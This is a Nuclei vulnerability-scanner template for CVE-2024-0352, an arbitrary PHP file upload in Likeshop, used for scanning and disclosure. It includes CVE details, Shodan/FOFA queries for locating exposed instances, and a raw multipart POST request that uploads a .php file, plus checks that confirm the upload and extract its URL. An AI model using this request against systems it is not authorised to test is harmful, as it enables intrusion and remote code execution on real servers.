id: CVE-2024-0352 info: name: Likeshop < 2.5.7.20210311 - Arbitrary File Upload author: CookieHanHoan,babybash,samuelsamuelsamuel severity: critical description: | A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434 impact: | The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability. remediation: Update to the latest version reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-0352 - https://note.zhaoj.in/share/ciwYj7QXC4sZ - https://vuldb.com/?ctiid.250120 - https://vuldb.com/?id.250120 - https://github.com/tanjiti/sec_profile classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-0352 cwe-id: CWE-434 epss-score: 0.0086 epss-percentile: 0.82263 cpe: cpe:2.3:a:likeshop:likeshop:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: likeshop product: likeshop shodan-query: http.favicon.hash:874152924 fofa-query: icon_hash=874152924 tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive variables: filename: "{{rand_base(6)}}" http: - raw: - | POST /api/file/formimage HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 ------WebKitFormBoundarygcflwtei Content-Disposition: form-data; name="file";filename="{{filename}}.php" Content-Type: application/x-php {{randstr}} ------WebKitFormBoundarygcflwtei-- matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "\"name\":\"{{filename}}.php\"")' - 'contains_all(body, "code\":1", "base_url\":\"uploads\\/user")' condition: and extractors: - type: json part: body json: - ".data.url" # digest: 4a0a00473045022100f918936fafffcf93421ce086207f2283925cd669ecc632d7ed2bc75094b855a802200fd6828f58d3fe1ed11a252d611b4b5a317e232fcc89bb3d80c103e17ea3ac4e:922c64590222798bb761d5b6d8e72950